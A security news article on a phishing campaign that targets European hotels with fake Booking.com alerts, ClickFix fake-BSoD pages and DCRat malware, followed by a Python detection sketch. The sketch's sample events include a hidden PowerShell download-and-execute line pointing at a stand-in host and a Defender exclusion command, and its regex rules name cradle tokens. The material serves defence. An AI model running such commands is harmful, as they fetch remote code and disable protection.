Sophisticated Phishing Campaign Targets European Hotels with Fake Booking Alerts and DCRat Malware
By John Jordan
A new cyberattack campaign, dubbed PHALT#BLYX, is targeting the European hospitality sector by impersonating Booking.com. Attackers are using deceptive "ClickFix" lures to trick hotel staff into executing malicious code, ultimately deploying the DCRat remote access trojan. The campaign was first detected in late December 2025 and highlights the evolving tactics of cybercriminals.
Key Takeaways
Attackers use fake Booking.com cancellation emails to lure victims.
Victims are redirected to spoofed websites that display fake Blue Screen of Death (BSoD) errors.
The campaign leverages "Living off the Land" techniques, including the abuse of legitimate system tools like MSBuild.exe.
The ultimate goal is to deploy the DCRat remote access trojan, capable of stealing sensitive information and executing commands.
Evidence suggests the campaign is linked to Russian threat actors.
The Attack Chain Unveiled
The campaign begins with phishing emails that appear to be from Booking.com, warning recipients of unexpected reservation cancellations. These emails often include specific room charge details in Euros, suggesting a targeted approach towards European organizations. The messages urge recipients to click a link to confirm the cancellation.
This link directs the victim to a fake website that closely mimics Booking.com. Here, a simulated CAPTCHA page is presented, followed by a bogus Blue Screen of Death (BSoD) error page. This fake error page provides "recovery instructions" that prompt the user to open the Windows Run dialog, paste a command, and press Enter.
Executing Malicious Code
Unbeknownst to the victim, this action executes a PowerShell command. This command initiates a multi-stage process, starting with the download of an MSBuild project file from a malicious domain. The legitimate "MSBuild.exe" tool is then used to execute this project file, which contains embedded malicious code.
The initial PowerShell script is designed to fetch and execute remote code silently. The MSBuild project file does the heavy lifting: it configures Microsoft Defender Antivirus exclusions to evade detection, establishes persistence by placing a shortcut in the Startup folder, and downloads the DCRat malware. If the malware detects that it is running with administrator privileges, it can disable security software entirely. Without elevated rights, it repeatedly triggers User Account Control (UAC) prompts, betting that a frustrated user will eventually click through and grant the permissions it needs.
As a distraction, the PowerShell code also opens the legitimate Booking.com admin page in the victim's default browser, creating the illusion that the actions taken were legitimate.
DCRat: A Versatile Remote Access Trojan
DCRat, also known as DarkCrystal RAT, is a .NET-based remote access trojan. It is a variant of AsyncRAT and is capable of harvesting sensitive information. Its plugin-based architecture allows for expandable functionality. Once deployed, DCRat can connect to a command and control (C2) server, profile the infected system, and await further instructions. This enables attackers to perform actions such as logging keystrokes, running arbitrary commands, and delivering additional payloads, including cryptocurrency miners.
Indicators and Mitigation
The campaign's use of "Living off the Land" techniques, such as abusing trusted system binaries like MSBuild.exe, demonstrates a sophisticated understanding of endpoint protection mechanisms. Researchers have identified Cyrillic debug strings within the MSBuild file, linking the activity to Russian threat actors. Organizations are advised to monitor PowerShell and MSBuild activities, detect suspicious .proj or .url files, and reinforce staff awareness regarding ClickFix-style phishing lures.
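As an added illustration, not code from the article or from the cited researchers, the Python sketch below turns the monitoring advice above into concrete rules and runs them over constructed sample process-creation and file-creation records. The rule names, the parent/child pairings, the two-stage verdict threshold and every sample record are assumptions; the domain in the sample command line is the reserved .invalid TLD. Real telemetry (Sysmon, EDR) would have to be mapped onto the Event structure first.

```python
"""Detection sketch for a ClickFix -> PowerShell -> MSBuild -> RAT chain.

Stages looked for (each one is an assumption about how the chain surfaces
in telemetry, not something the article specifies):
  1. PowerShell spawned by explorer.exe (the Run dialog's parent) with a
     download/execute cradle in its command line.
  2. MSBuild.exe started by a script host and handed a project file.
  3. A Defender exclusion being added via the MpPreference cmdlets.
  4. A .url/.lnk file created in a Startup folder.
All events below are CONSTRUCTED samples, not real logs.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process" (process creation) or "file" (file creation)
    image: str         # full path of the new process, or of the created file
    parent: str = ""   # parent process image (process events only)
    cmdline: str = ""  # command line (process events only)


# Script hosts that should rarely, if ever, be the parent of MSBuild.exe
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Common PowerShell download/execute cradle tokens
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                       r"|invoke-expression|\biex\b|\bcurl\b", re.I)
# Defender exclusion changes through the MpPreference cmdlets
EXCLUSION_RE = re.compile(r"(add|set)-mppreference\b.*-exclusion(path|process|extension)", re.I)
# A project file handed to MSBuild
PROJ_RE = re.compile(r"\.(proj|csproj|vbproj)\b", re.I)
# Per-user and all-users Startup folders
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(url|lnk)$", re.I)


def basename(path):
    """Lower-cased file name of a Windows path ('' stays '')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the rule names one event triggers (empty list = nothing seen)."""
    hits = []
    if ev.kind == "process":
        img, par = basename(ev.image), basename(ev.parent)
        if img in {"powershell.exe", "pwsh.exe"} and par == "explorer.exe" \
                and CRADLE_RE.search(ev.cmdline):
            hits.append("run_dialog_download_cradle")
        if img == "msbuild.exe" and par in SCRIPT_HOSTS and PROJ_RE.search(ev.cmdline):
            hits.append("msbuild_project_from_script_host")
        if EXCLUSION_RE.search(ev.cmdline):
            hits.append("defender_exclusion_added")
    elif ev.kind == "file" and STARTUP_RE.search(ev.image):
        hits.append("startup_shortcut_dropped")
    return hits


def detect(events):
    """Map rule name -> indices of the events that triggered it."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            findings.setdefault(rule, []).append(i)
    return findings


def verdict(findings):
    """Two or more distinct stages on one host is treated as a strong signal."""
    stages = len(findings)
    if stages >= 2:
        return "likely ClickFix->MSBuild->RAT chain"
    if stages == 1:
        return "single suspicious stage, triage"
    return "no match"


# Constructed sample telemetry: a benign event, the four chain stages, then two
# benign look-alikes (MSBuild from Visual Studio, harmless PowerShell from Run).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          'powershell -w hidden -c "iex (iwr http://constructed.example.invalid/s)"'),
    Event("process", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"MSBuild.exe C:\Users\staff\AppData\Local\Temp\build.proj"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          r"powershell Add-MpPreference -ExclusionPath C:\Users\staff\AppData"),
    Event("file", r"C:\Users\staff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"),
    Event("process", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "MSBuild.exe App.csproj"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          "powershell Get-Process"),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, idx in found.items():
        print(f"{rule}: events {idx}")
    print(verdict(found))
```

Each rule on its own is noisy (developers legitimately run MSBuild, administrators legitimately add exclusions), which is why the verdict only fires on several stages from the same host; in practice the correlation window and the set of trusted parents would be tuned to the environment.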
Sources
Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat, The Hacker News.
New ClickFix Attack Deploys Fake Windows BSOD Screens to Deceive Users into Running Malicious Code, Cyber Press.